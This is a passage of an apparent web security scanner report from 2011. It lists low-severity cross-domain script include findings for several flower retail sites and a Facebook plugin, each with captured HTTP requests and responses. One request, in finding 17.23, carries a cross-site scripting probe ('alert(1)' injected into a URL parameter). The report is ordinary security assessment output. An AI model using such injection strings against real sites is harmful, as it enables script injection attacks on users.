   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
17.17. http://ww30.1800flowers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
17.18. http://ww30.1800flowers.com/collection.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:11 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qD3wSlEaCI6fvlpmlKhLnKM:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 73822


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
17.19. http://ww30.1800flowers.com/product.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /product.do?baseCode=91637&dataset=10305&cm_cid=d10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.3.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902894375&t2=1304902899114&t3=1304902906957&t4=1304902893038&lti=1304902906957&ln=&hr=/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&fti=&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3B&ac=&fd=&uer=&fu=&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:07:59 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 88969


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
17.20. http://ww30.1800flowers.com/shoppingbasket.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:22 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000GsjYiBW6hk4zCZT985cxiBR:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 62042


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...
17.21. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<body >
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="https://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


<script language="javascript1.1" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
17.22. https://ww30.1800flowers.com/continueasguest.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<body onscroll='bodyScroll()'>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/redesign/redesign_common_apr1.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="https://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


<script language="javascript1.1" src="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
17.23. http://www.cherrymoonfarms.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<link rel="canonical" href="http://www.cherrymoonfarms.com/" /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="mainContainer" style="margin-bottom:5px;">
           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="SearchHolder">
    <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
17.25. http://www.ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
